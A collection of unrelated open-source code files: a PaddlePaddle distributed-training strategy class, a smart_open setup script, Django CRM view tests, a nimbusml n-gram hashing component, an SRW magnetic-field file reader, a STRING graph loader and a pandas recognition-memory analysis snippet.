def lars_configs(self):
"""
Set Lars training configurations.
**Notes**:
**lars_coeff (float)**: trust ratio in lars formula.
**lars_weight_decay** (float): weight decay coefficient in lars formula.
**epsilon (float)**: argument is used to avoid potential devision-by-zero
when compute the local lr;
**exclude_from_weight_decay ([string])**: is a list of name strings of layers which
will be exclude from weight decay in lars formula.
Examples:
.. code-block:: python
import paddle.distributed.fleet as fleet
strategy = fleet.DistributedStrategy()
strategy.lars = True
strategy.lars_configs = {
"lars_coeff": 0.01,
"lars_weight_decay": 0.0005,
"epsilon": 0,
"exclude_from_weight_decay": ['batch_norm', '.b_0']
}
"""
return get_msg_dict(self.strategy.lars_configs)
@lars_configs.setter
@is_strict_auto
def lars_configs(self, configs):
check_configs_key(self.strategy.lars_configs, configs, "lars_configs")
assign_configs_value(self.strategy.lars_configs, configs)
@property
def lamb(self):
"""
Set lamb configurations. lamb is used to deal with the convergence problems for large
batch size training, specially for attention-related model like BERT. For more details,
please refer to
[Large Batch Optimization for Deep Learning: Training BERT in 76 minutes](https://arxiv.org/abs/1904.00962).
Default Value: False
Examples:
.. code-block:: python
import paddle.distributed.fleet as fleet
strategy = fleet.DistributedStrategy()
strategy.lamb = True # by default this is false
"""
return self.strategy.lamb
@lamb.setter
@is_strict_auto
def lamb(self, flag):
if isinstance(flag, bool):
self.strategy.lamb = flag
else:
print("WARNING: lamb should have value of bool type")
@property
def lamb_configs(self):
"""
Set Lars training configurations.
**Notes**:
**lamb_weight_decay** (float): weight decay coefficient in lamb formula.
**exclude_from_weight_decay ([string])**: is a list of name strings of layers which
will be exclude from weight decay in lamb formula.
Examples:
.. code-block:: python
import paddle.distributed.fleet as fleet
strategy = fleet.DistributedStrategy()
strategy.lamb = True
strategy.lamb_configs = {
'lamb_weight_decay': 0.01,
'exclude_from_weight_decay': [],
}
"""
return get_msg_dict(self.strategy.lamb_configs)
@lamb_configs.setter
@is_strict_auto
def lamb_configs(self, configs):
check_configs_key(self.strategy.lamb_configs, configs, "lamb_configs")
assign_configs_value(self.strategy.lamb_configs, configs)
@property
def elastic(self):
"""
Indicating whether we want to do current distributed training on clusters with elastic resources.
Currently, this is configuration is not valid.
"""
return self.strategy.elastic
@elastic.setter
@is_strict_auto
def elastic(self, flag):
if isinstance(flag, bool):
self.strategy.elastic = flag
else:
print("WARNING: elastic should have value of bool type")
@property
def auto(self):
"""
Indicating whether we are using auto-parallel configuration
This feature is currently an experimental feature. Currently,
auto-parallelism can be used only when a user does not set any other
strategy configs except auto. For details, please reference the following
code example
Default Value: False
Examples:
.. code-block:: python
import paddle
paddle.enable_static()
import paddle.distributed.fleet as fleet
strategy = fleet.DistributedStrategy()
strategy.auto = True
# if set other strategy at the same time, auto will not apply
# strategy.amp = True
optimizer = paddle.optimizer.SGD(learning_rate=0.01)
optimizer = fleet.distributed_optimizer(optimizer, strategy)
"""
return self.strategy.auto
@auto.setter
def auto(self, flag):
if isinstance(flag, bool):
self.strategy.auto = flag
else:
print("WARNING: auto should have value of bool type")
@property
def cudnn_exhaustive_search(self):
"""
Indicating whether to use exhaustive search method to choose convolution algorithms.
Exhaustive search attempts all cuDNN algorithms to choose the fastest algorithm.
This method is time-consuming, the choosed algorithm will be cached for the given layer specifications.
Once the layer specifications (like batch size, feature map size) are changed, it will search again.
Default Value: True
Examples:
.. code-block:: python
import paddle
paddle.enable_static()
import paddle.distributed.fleet as fleet
strategy = fleet.DistributedStrategy()
strategy.cudnn_exhaustive_search = False
optimizer = paddle.optimizer.SGD(learning_rate=0.01)
optimizer = fleet.distributed_optimizer(optimizer, strategy)
"""
return self.strategy.cudnn_exhaustive_search
@cudnn_exhaustive_search.setter
@is_strict_auto
def cudnn_exhaustive_search(self, flag):
if isinstance(flag, bool):
self.strategy.cudnn_exhaustive_search = flag
else:
print(
"WARNING: cudnn_exhaustive_search should have value of bool type"
)
@property
def conv_workspace_size_limit(self):
"""
The workspace limit size in MB unit for choosing cuDNN convolution algorithms.
The inner funciton of cuDNN obtain the fastest suited algorithm that fits within this memory limit.
Usually, large workspace size may lead to choose faster algorithms,
but significant increasing memory workspace. Users need to trade-off between memory and speed.
Default Value: 4000
Examples:
.. code-block:: python
import paddle
paddle.enable_static()
import paddle.distributed.fleet as fleet
strategy = fleet.DistributedStrategy()
strategy.conv_workspace_size_limit = 1024
optimizer = paddle.optimizer.SGD(learning_rate=0.01)
optimizer = fleet.distributed_optimizer(optimizer, strategy)
"""
return self.strategy.conv_workspace_size_limit
@conv_workspace_size_limit.setter
@is_strict_auto
def conv_workspace_size_limit(self, value):
if isinstance(value, int):
self.strategy.conv_workspace_size_limit = value
else:
print(
"WARNING: conv_workspace_size_limit should have value of int type"
)
@property
def cudnn_batchnorm_spatial_persistent(self):
"""
Indicates whether to use the mode CUDNN_BATCHNORM_SPATIAL_PERSISTENT function in batchnorm.
This is only useful in cudnn.
Default Value: True
Examples:
.. code-block:: python
import paddle
paddle.enable_static()
import paddle.distributed.fleet as fleet
strategy = fleet.DistributedStrategy()
strategy.cudnn_batchnorm_spatial_persistent = True
optimizer = paddle.optimizer.SGD(learning_rate=0.01)
optimizer = fleet.distributed_optimizer(optimizer, strategy)
"""
return self.strategy.cudnn_batchnorm_spatial_persistent
@cudnn_batchnorm_spatial_persistent.setter
@is_strict_auto
def cudnn_batchnorm_spatial_persistent(self, flag):
if isinstance(flag, bool):
self.strategy.cudnn_batchnorm_spatial_persistent = flag
else:
print(
"WARNING: cudnn_batchnorm_spatial_persistent should have value of bool type"
)
def _enable_env(self):
strategy = self.strategy
keys = [
"FLAGS_cudnn_batchnorm_spatial_persistent",
"FLAGS_conv_workspace_size_limit",
"FLAGS_cudnn_exhaustive_search",
"FLAGS_sync_nccl_allreduce",
"FLAGS_fuse_parameter_memory_size",
"FLAGS_fuse_parameter_groups_size",
]
values = [
bool(strategy.cudnn_batchnorm_spatial_persistent),
int(strategy.conv_workspace_size_limit),
bool(strategy.cudnn_exhaustive_search),
bool(strategy.sync_nccl_allreduce),
int(strategy.fuse_grad_size_in_MB),
int(strategy.fuse_grad_size_in_TFLOPS),
]
for i, key in enumerate(keys):
if core.globals().is_public(key):
core.globals()[key] = values[i]
def _is_strict_auto(self):
global non_auto_func_called
if self.strategy.auto and non_auto_func_called:
return True
return False
def __repr__(self):
spacing = 2
max_k = 38
max_v = 38
length = max_k + max_v + spacing
h1_format = " " + "|{{:^{}s}}|\n".format(length)
h2_format = " " + "|{{:>{}s}}{}{{:^{}s}}|\n".format(max_k, " " *
spacing, max_v)
border = " +" + "".join(["="] * length) + "+"
line = " +" + "".join(["-"] * length) + "+"
draws = border + "\n"
draws += h1_format.format("")
draws += h1_format.format("DistributedStrategy Overview")
draws += h1_format.format("")
fields = self.strategy.DESCRIPTOR.fields
str_res = ""
env_draws = line + "\n"
for f in fields:
if "build_strategy" in f.name or "execution_strategy" in f.name:
continue
if "_configs" in f.name:
continue
else:
if isinstance(getattr(self.strategy, f.name), bool):
if hasattr(self.strategy, f.name + "_configs"):
if getattr(self.strategy, f.name):
draws += border + "\n"
draws += h1_format.format(
"{}=True <-> {}_configs".format(f.name, f.name))
draws += line + "\n"
my_configs = getattr(self.strategy,
f.name + "_configs")
config_fields = my_configs.DESCRIPTOR.fields
for ff in config_fields:
if isinstance(
getattr(my_configs, ff.name),
google.protobuf.pyext._message.
RepeatedScalarContainer):
values = getattr(my_configs, ff.name)
for i, v in enumerate(values):
if i == 0:
draws += h2_format.format(ff.name,
str(v))
else:
draws += h2_format.format("",
str(v))
else:
draws += h2_format.format(
ff.name,
str(getattr(my_configs, ff.name)))
else:
env_draws += h2_format.format(
f.name, str(getattr(self.strategy, f.name)))
else:
env_draws += h2_format.format(
f.name, str(getattr(self.strategy, f.name)))
result_res = draws + border + "\n" + h1_format.format(
"Environment Flags, Communication Flags")
result_res += env_draws
build_strategy_str = border + "\n"
build_strategy_str += h1_format.format("Build Strategy")
build_strategy_str += line + "\n"
fields = self.strategy.build_strategy.DESCRIPTOR.fields
for f in fields:
build_strategy_str += h2_format.format(
f.name, str(getattr(self.strategy.build_strategy, f.name)))
build_strategy_str += border + "\n"
execution_strategy_str = h1_format.format("Execution Strategy")
execution_strategy_str += line + "\n"
fields = self.strategy.execution_strategy.DESCRIPTOR.fields
for f in fields:
execution_strategy_str += h2_format.format(
f.name, str(getattr(self.strategy.execution_strategy, f.name)))
execution_strategy_str += border + "\n"
result_res += build_strategy_str + execution_strategy_str
return result_res
|
the-stack_106_19046
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2015 Radim Rehurek <[email protected]>
#
# This code is distributed under the terms and conditions
# from the MIT License (MIT).
import io
import os
from setuptools import setup, find_packages
def read(fname):
return io.open(os.path.join(os.path.dirname(__file__), fname), encoding='utf-8').read()
tests_require = [
'mock',
'moto==0.4.31',
'pathlib2',
'responses',
]
setup(
name='smart_open',
version='1.6.0',
description='Utils for streaming large files (S3, HDFS, gzip, bz2...)',
long_description=read('README.rst'),
packages=find_packages(),
package_data={"smart_open.tests": ["test_data/*gz"]},
author='Radim Rehurek',
author_email='[email protected]',
maintainer='Radim Rehurek',
maintainer_email='[email protected]',
url='https://github.com/piskvorky/smart_open',
download_url='http://pypi.python.org/pypi/smart_open',
keywords='file streaming, s3, hdfs',
license='MIT',
platforms='any',
install_requires=[
'boto >= 2.32',
'bz2file',
'requests',
'boto3'
],
tests_require=tests_require,
extras_require={
'test': tests_require,
},
test_suite="smart_open.tests",
classifiers=[
'Development Status :: 4 - Beta',
'Environment :: Console',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Topic :: System :: Distributed Computing',
'Topic :: Database :: Front-Ends',
],
)
|
the-stack_106_19047
|
from http import HTTPStatus
from django.contrib.auth import get_user_model
from django.test import Client, TestCase
from django.urls import reverse
from accounts.models import ClientProfile
from config import settings
from crm.models import Request
User = get_user_model()
class CrmPagesTests(TestCase):
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.user_repair = User.objects.create_user(
first_name='Виктория', last_name='Аксентий', username='vika')
cls.user_repair.profile.role = settings.REPAIR_SPECIALIST
cls.new_client = ClientProfile.objects.create(
first_name='Виктория', last_name='Аксентий'
)
cls.user_role_isuser = User.objects.create_user(
first_name='Петя', last_name='Иванов', username='petya')
cls.request = Request.objects.create(
subject=settings.REPAIR,
first_name='Алла',
last_name='Иванова',
telegram='1122638601',
notifications=True,
description='Текст заявки')
cls.url_names = [
reverse('dashboard'),
reverse('profile_update'),
reverse('profile'),
reverse('clients'),
reverse('new_client'),
reverse(
'client_profile', kwargs={'pk': CrmPagesTests.new_client.pk}
),
reverse(
'client_profile_update',
kwargs={'pk': CrmPagesTests.new_client.pk}
),
reverse('colleagues'),
reverse('requests'),
reverse('new_request'),
reverse(
'request_detail', kwargs={'pk': CrmPagesTests.request.pk}
),
reverse(
'request_update', kwargs={'pk': CrmPagesTests.request.pk}
),
]
def setUp(self):
self.user_auth = Client()
self.user_auth.force_login(CrmPagesTests.user_repair)
self.user_role_isuser = Client()
self.user_role_isuser.force_login(CrmPagesTests.user_role_isuser)
def test_pages_uses_correct_template(self):
templates_url_names = {
'index.html': reverse('index'),
'home.html': reverse('home'),
'crm/dashboard.html': reverse('dashboard'),
'crm/profile_update.html': reverse('profile_update'),
'crm/profile.html': reverse('profile'),
'crm/clients_list.html': reverse('clients'),
'crm/new_client.html': reverse('new_client'),
'crm/client_profile.html': reverse(
'client_profile', kwargs={'pk': CrmPagesTests.new_client.pk}
),
'crm/client_profile_update.html': reverse(
'client_profile_update',
kwargs={'pk': CrmPagesTests.new_client.pk}
),
'crm/colleagues_list.html': reverse('colleagues'),
'clients/create_request.html': reverse('client_send_request'),
'crm/requests.html': reverse('requests'),
'crm/new_request.html': reverse('new_request'),
'crm/request_detail.html': reverse(
'request_detail', kwargs={'pk': CrmPagesTests.request.pk}
),
'crm/request_update.html': reverse(
'request_update', kwargs={'pk': CrmPagesTests.request.pk}
),
}
for template, url in templates_url_names.items():
with self.subTest(url=url):
response = self.user_auth.get(url)
self.assertTemplateUsed(response, template)
def test_not_auth_user_not_access_pages(self):
for url in CrmPagesTests.url_names:
with self.subTest(url=url):
response = self.client.get(url)
self.assertEqual(response.status_code, HTTPStatus.FOUND)
def test_auth_user_role_isuser_not_access_pages(self):
for url in CrmPagesTests.url_names:
with self.subTest(url=url):
response = self.user_role_isuser.get(url)
self.assertEqual(response.status_code, HTTPStatus.FORBIDDEN)
def test_new_request_appears_on_pages(self):
url_pages = (
reverse('dashboard'),
reverse('requests')
)
for url in url_pages:
with self.subTest(value=url):
response = self.user_auth.get(url)
self.assertContains(
response,
f'{CrmPagesTests.request.first_name} '
f'{CrmPagesTests.request.last_name}'
)
def test_update_status_request(self):
form_data = {'status': settings.WORK}
self.user_auth.post(
reverse(
'request_update',
kwargs={'pk': CrmPagesTests.request.pk}),
data=form_data,
follow=True
)
response = self.user_auth.get(
reverse(
'request_detail',
kwargs={'pk': CrmPagesTests.request.pk})
)
request_object = response.context['request']
self.assertEquals(request_object.status, 'work')
def test_delete_request(self):
self.user_auth.post(
reverse(
'request_delete',
kwargs={'pk': CrmPagesTests.request.pk}))
response = self.user_auth.get(
reverse(
'request_detail',
kwargs={'pk': CrmPagesTests.request.pk})
)
self.assertEqual(response.status_code, HTTPStatus.NOT_FOUND)
self.assertFalse(
Request.objects.filter(
id=CrmPagesTests.request.id).exists()
)
def test_page_dashboard_filtering_requests_type_and_status(self):
request_repair = Request.objects.create(
subject=settings.REPAIR,
first_name='Ирина',
last_name='Иванова',
status=settings.OPEN
)
request_service = Request.objects.create(
subject=settings.SERVICE,
first_name='Виктория',
last_name='Бухун',
status=settings.CLOSE
)
subject = 'repair'
status = 'open'
response = self.user_auth.get(
f'/dashboard/?subject={subject}&status={status}'
)
self.assertContains(
response,
f'{request_repair.first_name} {request_repair.last_name}'
)
self.assertNotContains(
response,
f'{request_service.first_name} {request_service.last_name}'
)
def test_page_dashboard_filtering_requests_two_statuses(self):
request_repair = Request.objects.create(
subject=settings.REPAIR,
first_name='Ирина',
last_name='Иванова',
status=settings.OPEN
)
request_consult = Request.objects.create(
subject=settings.CONSULTATION,
first_name='Жанна',
last_name='Грачева',
status=settings.WORK
)
request_service = Request.objects.create(
subject=settings.SERVICE,
first_name='Виктория',
last_name='Бухун',
status=settings.CLOSE
)
status = 'open'
status_2 = 'work'
response = self.user_auth.get(
f'/dashboard/?status={status}&status={status_2}'
)
self.assertContains(
response,
f'{request_repair.first_name} {request_repair.last_name}' and
f'{request_consult.first_name} {request_consult.last_name}'
)
self.assertNotContains(
response,
f'{request_service.first_name} {request_service.last_name}'
)
def test_page_requests_only_accordance_with_employee_position(self):
request_repair = Request.objects.create(
subject=settings.REPAIR,
first_name='Ирина',
last_name='Иванова',
status=settings.OPEN
)
request_repair_2 = Request.objects.create(
subject=settings.REPAIR,
first_name='Жанна',
last_name='Грачева',
status=settings.WORK
)
request_service = Request.objects.create(
subject=settings.SERVICE,
first_name='Виктория',
last_name='Бухун',
status=settings.CLOSE
)
response = self.user_auth.get(reverse('requests'))
self.assertContains(
response,
f'{request_repair.first_name} {request_repair.last_name}' and
f'{request_repair_2.first_name} {request_repair_2.last_name}'
)
self.assertNotContains(
response,
f'{request_service.first_name} {request_service.last_name}'
)
def test_page_clients_new_client_appears_on_pages(self):
response = self.user_auth.get(reverse('clients'))
self.assertContains(
response,
f'{CrmPagesTests.new_client.first_name} '
f'{CrmPagesTests.new_client.last_name}'
)
self.assertTrue(
ClientProfile.objects.filter(
id=CrmPagesTests.new_client.id).exists()
)
def test_update_client_profile(self):
form_data = {
'email': '[email protected]',
'phone': '89998880088'
}
self.user_auth.post(
reverse(
'client_profile_update',
kwargs={'pk': CrmPagesTests.new_client.pk}),
data=form_data,
follow=True
)
response = self.user_auth.get(
reverse(
'client_profile',
kwargs={'pk': CrmPagesTests.new_client.pk})
)
request_object = response.context['user']
self.assertEqual(
request_object.first_name, CrmPagesTests.new_client.first_name
)
self.assertEqual(
request_object.last_name, CrmPagesTests.new_client.last_name
)
self.assertEqual(request_object.email, CrmPagesTests.new_client.email)
self.assertEqual(request_object.phone, CrmPagesTests.new_client.phone)
def test_delete_client_profile(self):
self.user_auth.post(
reverse(
'client_profile_delete',
kwargs={'pk': CrmPagesTests.new_client.pk}))
response = self.user_auth.get(
reverse(
'client_profile',
kwargs={'pk': CrmPagesTests.new_client.pk})
)
self.assertEqual(response.status_code, HTTPStatus.NOT_FOUND)
self.assertFalse(
ClientProfile.objects.filter(
id=CrmPagesTests.new_client.id).exists()
)
|
the-stack_106_19048
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
# --------------------------------------------------------------------------------------------
# - Generated by tools/entrypoint_compiler.py: do not edit by hand
"""
NgramHash
"""
__all__ = ["NgramHash"]
import numbers
from .....utils.entrypoints import Component
from .....utils.utils import trace, try_set
class NgramHash(Component):
"""
Extracts NGrams from text and converts them to vector using hashing
trick.
.. remarks::
The ``NGramFeaturizer`` transform produces a bag of counts of
sequences of consecutive words, called n-grams, from a given corpus
of text.
There are two ways it can do this:
* build a dictionary of n-grams and use the id in the dictionary as
the index in the bag;
* hash each n-gram and use the hash value as the index in the bag.
This class provide the text extractor that implement the second. In
:py:class:`NGramFeaturizer
<nimbusml.feature_extraction.text.NGramFeaturizer>`,
users should specify which text extractor to use as the argument.
The purpose of hashing is to convert variable-length text documents
into equal-length numeric feature vectors, to support
dimensionality reduction and to make the lookup of feature weights
faster.
The n-grams are represented as count vectors, with vector slots
corresponding to their hashes. Embedding ngrams in
a vector space allows their contents to be compared in an efficient
manner.
The slot values in the vector can be weighted by the following
factors:
* *term frequency* - The number of occurrences of the slot in the
text
* *inverse document frequency* - A ratio (the logarithm of
inverse relative slot frequency) that measures the information a
slot
provides by determining how common or rare it is across the entire
text.
* *term frequency-inverse document frequency* - the product
term frequency and the inverse document frequency.
:param number_of_bits: Number of bits to hash into. Must be between 1 and
30, inclusive.
:param ngram_length: Ngram length.
:param skip_length: Maximum number of tokens to skip when constructing an
n-gram.
:param all_lengths: Whether to include all n-gram lengths up to ngramLength
or only ngramLength.
:param seed: Hashing seed.
:param ordered: Whether the position of each source column should be
included in the hash (when there are multiple source columns).
:param maximum_number_of_inverts: Limit the number of keys used to generate
the slot name to this many. 0 means no invert hashing, -1 means no
limit.
:param params: Additional arguments sent to compute engine.
.. seealso::
:py:class:`NGramFeaturizer
<nimbusml.feature_extraction.text.NGramFeaturizer>`,
:py:class:`Ngram <nimbusml.feature_extraction.text.extractor.Ngram>`
.. index:: transform, featurizer, text
Example:
.. literalinclude:: /../nimbusml/examples/NGramFeaturizer3.py
:language: python
"""
@trace
def __init__(
self,
number_of_bits=16,
ngram_length=1,
skip_length=0,
all_lengths=True,
seed=314489979,
ordered=True,
maximum_number_of_inverts=0,
**params):
self.number_of_bits = number_of_bits
self.ngram_length = ngram_length
self.skip_length = skip_length
self.all_lengths = all_lengths
self.seed = seed
self.ordered = ordered
self.maximum_number_of_inverts = maximum_number_of_inverts
self.kind = 'NgramExtractor'
self.name = 'NGramHash'
self.settings = {}
if number_of_bits is not None:
self.settings['NumberOfBits'] = try_set(
obj=number_of_bits,
none_acceptable=True,
is_of_type=numbers.Real)
if ngram_length is not None:
self.settings['NgramLength'] = try_set(
obj=ngram_length,
none_acceptable=True,
is_of_type=numbers.Real)
if skip_length is not None:
self.settings['SkipLength'] = try_set(
obj=skip_length,
none_acceptable=True,
is_of_type=numbers.Real)
if all_lengths is not None:
self.settings['AllLengths'] = try_set(
obj=all_lengths, none_acceptable=True, is_of_type=bool)
if seed is not None:
self.settings['Seed'] = try_set(
obj=seed,
none_acceptable=True,
is_of_type=numbers.Real)
if ordered is not None:
self.settings['Ordered'] = try_set(
obj=ordered, none_acceptable=True, is_of_type=bool)
if maximum_number_of_inverts is not None:
self.settings['MaximumNumberOfInverts'] = try_set(
obj=maximum_number_of_inverts,
none_acceptable=True,
is_of_type=numbers.Real)
super(
NgramHash,
self).__init__(
name=self.name,
settings=self.settings,
kind=self.kind)
|
the-stack_106_19053
|
from oasys_srw.srwlib import SRWLMagFldC, SRWLMagFld3D, array
from syned.storage_ring.magnetic_structure import MagneticStructure
from wofrysrw.storage_ring.srw_magnetic_structure import SRWMagneticStructure
# from original SRW Example 01, by Oleg Chubar (BNL)
def AuxReadInMagFld3D(filePath, sCom):
f = open(filePath, 'r')
f.readline() # 1st line: just pass
xStart = float(f.readline().split(sCom, 2)[1]) # 2nd line: initial X position [m]; it will not actually be used
xStep = float(f.readline().split(sCom, 2)[1]) # 3rd line: step vs X [m]
xNp = int(f.readline().split(sCom, 2)[1]) # 4th line: number of points vs X
yStart = float(f.readline().split(sCom, 2)[1]) # 5th line: initial Y position [m]; it will not actually be used
yStep = float(f.readline().split(sCom, 2)[1]) # 6th line: step vs Y [m]
yNp = int(f.readline().split(sCom, 2)[1]) # 7th line: number of points vs Y
zStart = float(f.readline().split(sCom, 2)[1]) # 8th line: initial Z position [m]; it will not actually be used
zStep = float(f.readline().split(sCom, 2)[1]) # 9th line: step vs Z [m]
zNp = int(f.readline().split(sCom, 2)[1]) # 10th line: number of points vs Z
totNp = xNp * yNp * zNp
locArBx = array('d', [0] * totNp)
locArBy = array('d', [0] * totNp)
locArBz = array('d', [0] * totNp)
for i in range(totNp):
curLineParts = f.readline().split('\t')
if len(curLineParts) == 3:
locArBx[i] = float(curLineParts[0].strip())
locArBy[i] = float(curLineParts[1].strip())
locArBz[i] = float(curLineParts[2].strip())
f.close()
xRange = xStep
if xNp > 1: xRange = (xNp - 1) * xStep
yRange = yStep
if yNp > 1: yRange = (yNp - 1) * yStep
zRange = zStep
if zNp > 1: zRange = (zNp - 1) * zStep
return SRWLMagFld3D(locArBx, locArBy, locArBz, xNp, yNp, zNp, xRange, yRange, zRange, 1)
class SRW3DMagneticStructure(MagneticStructure, SRWMagneticStructure):
def __init__(self,
file_name="",
comment_character="#",
interpolation_method=1):
MagneticStructure.__init__(self)
self.file_name = file_name
self.comment_character = comment_character
self.interpolation_method=interpolation_method
def get_SRWMagneticStructure(self):
return AuxReadInMagFld3D(self.file_name, self.comment_character)
def get_SRWLMagFldC(self):
magnetic_field_container = SRWLMagFldC() # Container
magnetic_field_container.allocate(1) # Magnetic Field consists of 1 part
magnetic_field_container.arMagFld[0] = self.get_SRWMagneticStructure()
magnetic_field_container.arMagFld[0].interp = self.interpolation_method
magnetic_field_container.arXc[0] = self.horizontal_central_position
magnetic_field_container.arYc[0] = self.vertical_central_position
magnetic_field_container.arZc[0] = self.longitudinal_central_position
magnetic_field_container.arMagFld[0].nRep = 1
return magnetic_field_container
@classmethod
def get_default_initial_z(cls, file_name, comment_character="#", longitudinal_central_position=0):
return longitudinal_central_position - 0.5*AuxReadInMagFld3D(file_name, comment_character).rz
@classmethod
def get_source_length(cls, file_name, comment_character="#"):
return AuxReadInMagFld3D(file_name, comment_character).rz
def to_python_code(self, data=None):
text_code = self.to_python_code_aux()
text_code += "magnetic_field_container = SRWLMagFldC()" + "\n"
text_code += "magnetic_field_container.allocate(1)" + "\n"
text_code += "magnetic_field_container.arMagFld[0] = magnetic_structure" + "\n"
text_code += "magnetic_field_container.arMagFld[0].interp = " + str(self.interpolation_method) + "\n"
text_code += "magnetic_field_container.arXc[0] = " + str(self.horizontal_central_position) + "\n"
text_code += "magnetic_field_container.arYc[0] = " + str(self.vertical_central_position) + "\n"
text_code += "magnetic_field_container.arZc[0] = " + str(self.longitudinal_central_position) + "\n"
return text_code
def to_python_code_aux(self):
text_code = "def AuxReadInMagFld3D(filePath, sCom):" + "\n" + \
" f = open(filePath, 'r')" + "\n" + \
" f.readline() # 1st line: just pass" + "\n\n" + \
" xStart = float(f.readline().split(sCom, 2)[1]) # 2nd line: initial X position [m]; it will not actually be used" + "\n" + \
" xStep = float(f.readline().split(sCom, 2)[1]) # 3rd line: step vs X [m]" + "\n" + \
" xNp = int(f.readline().split(sCom, 2)[1]) # 4th line: number of points vs X" + "\n" + \
" yStart = float(f.readline().split(sCom, 2)[1]) # 5th line: initial Y position [m]; it will not actually be used" + "\n" + \
" yStep = float(f.readline().split(sCom, 2)[1]) # 6th line: step vs Y [m]" + "\n" + \
" yNp = int(f.readline().split(sCom, 2)[1]) # 7th line: number of points vs Y" + "\n" + \
" zStart = float(f.readline().split(sCom, 2)[1]) # 8th line: initial Z position [m]; it will not actually be used" + "\n" + \
" zStep = float(f.readline().split(sCom, 2)[1]) # 9th line: step vs Z [m]" + "\n" + \
" zNp = int(f.readline().split(sCom, 2)[1]) # 10th line: number of points vs Z" + "\n" + \
" totNp = xNp * yNp * zNp" + "\n" + \
" locArBx = array('d', [0] * totNp)" + "\n" + \
" locArBy = array('d', [0] * totNp)" + "\n" + \
" locArBz = array('d', [0] * totNp)" + "\n\n" + \
" for i in range(totNp):" + "\n" + \
" curLineParts = f.readline().split('\t')" + "\n" + \
" if len(curLineParts) == 3:" + "\n" + \
" locArBx[i] = float(curLineParts[0].strip())" + "\n" + \
" locArBy[i] = float(curLineParts[1].strip())" + "\n" + \
" locArBz[i] = float(curLineParts[2].strip())" + "\n" + \
" f.close()" + "\n" + \
" xRange = xStep" + "\n" + \
" if xNp > 1: xRange = (xNp - 1) * xStep" + "\n" + \
" yRange = yStep" + "\n" + \
" if yNp > 1: yRange = (yNp - 1) * yStep" + "\n" + \
" zRange = zStep" + "\n" + \
" if zNp > 1: zRange = (zNp - 1) * zStep" + "\n" + \
" return SRWLMagFld3D(locArBx, locArBy, locArBz, xNp, yNp, zNp, xRange, yRange, zRange, 1)\n\n"
text_code += "magnetic_structure = AuxReadInMagFld3D(\"" + str(self.file_name) + "\",\"" + str(self.comment_character) + "\")" + "\n"
return text_code
|
the-stack_106_19054
|
"""
This file offers the methods to automatically retrieve the graph Planctopirus hydrillae.
The graph is automatically retrieved from the STRING repository.
References
---------------------
Please cite the following if you use the data:
```bib
@article{szklarczyk2019string,
title={STRING v11: protein--protein association networks with increased coverage, supporting functional discovery in genome-wide experimental datasets},
author={Szklarczyk, Damian and Gable, Annika L and Lyon, David and Junge, Alexander and Wyder, Stefan and Huerta-Cepas, Jaime and Simonovic, Milan and Doncheva, Nadezhda T and Morris, John H and Bork, Peer and others},
journal={Nucleic acids research},
volume={47},
number={D1},
pages={D607--D613},
year={2019},
publisher={Oxford University Press}
}
```
"""
from typing import Dict
from ..automatic_graph_retrieval import AutomaticallyRetrievedGraph
from ...ensmallen import Graph # pylint: disable=import-error
def PlanctopirusHydrillae(
directed: bool = False,
preprocess: bool = True,
load_nodes: bool = True,
verbose: int = 2,
cache: bool = True,
cache_path: str = "graphs/string",
version: str = "links.v11.5",
**additional_graph_kwargs: Dict
) -> Graph:
"""Return new instance of the Planctopirus hydrillae graph.
The graph is automatically retrieved from the STRING repository.
Parameters
-------------------
directed: bool = False
Wether to load the graph as directed or undirected.
By default false.
preprocess: bool = True
Whether to preprocess the graph to be loaded in
optimal time and memory.
load_nodes: bool = True,
Whether to load the nodes vocabulary or treat the nodes
simply as a numeric range.
verbose: int = 2,
Wether to show loading bars during the retrieval and building
of the graph.
cache: bool = True
Whether to use cache, i.e. download files only once
and preprocess them only once.
cache_path: str = "graphs"
Where to store the downloaded graphs.
version: str = "links.v11.5"
The version of the graph to retrieve.
The available versions are:
- homology.v11.5
- physical.links.v11.5
- links.v11.5
additional_graph_kwargs: Dict
Additional graph kwargs.
Returns
-----------------------
Instace of Planctopirus hydrillae graph.
References
---------------------
Please cite the following if you use the data:
```bib
@article{szklarczyk2019string,
title={STRING v11: protein--protein association networks with increased coverage, supporting functional discovery in genome-wide experimental datasets},
author={Szklarczyk, Damian and Gable, Annika L and Lyon, David and Junge, Alexander and Wyder, Stefan and Huerta-Cepas, Jaime and Simonovic, Milan and Doncheva, Nadezhda T and Morris, John H and Bork, Peer and others},
journal={Nucleic acids research},
volume={47},
number={D1},
pages={D607--D613},
year={2019},
publisher={Oxford University Press}
}
```
"""
return AutomaticallyRetrievedGraph(
graph_name="PlanctopirusHydrillae",
repository="string",
version=version,
directed=directed,
preprocess=preprocess,
load_nodes=load_nodes,
verbose=verbose,
cache=cache,
cache_path=cache_path,
additional_graph_kwargs=additional_graph_kwargs
)()
|
the-stack_106_19057
|
from paper_graphics_style import p_convert
'''code for grabbing all the data necessary for the tables of memory data'''
ctx_rname = {'baseline':'pre-conditioning','acquisition':'fear conditioning','extinction':'post-conditioning','':''}
ctx_rname_short = {'baseline':'pre','acquisition':'cond.','extinction':'post'}
'''recognition memory'''
df = pd.read_csv('../cleaned_corrected_recognition.csv')
table = df.groupby(['condition','encode_phase'])['cr'].apply(onesample_bdm)[['avg','CI_l','CI_u']]
table['sem'] = df.groupby(['condition','encode_phase'])['cr'].sem()
table['95% CI'] = table[['CI_l','CI_u']].values.tolist()
table = table.reset_index().drop(columns=['level_2','CI_l','CI_u']
).rename(columns={'condition':'CS Type',
'encode_phase':'Temporal Context',
'avg':'Mean',
'sem':'Std. Error'})
table = table[['Temporal Context','CS Type','Mean','95% CI','Std. Error']]
#and false alarms
fadf = df[df.encode_phase=='baseline'].drop(columns='encode_phase')
fatable = fadf.groupby(['condition'])['fa'].apply(onesample_bdm)[['avg','CI_l','CI_u']]
fatable = fatable.reset_index().set_index('condition').drop(columns='level_1')
fatable['sem'] = fadf.groupby('condition')['fa'].sem()
fatable['95% CI'] = fatable[['CI_l','CI_u']].values.tolist()
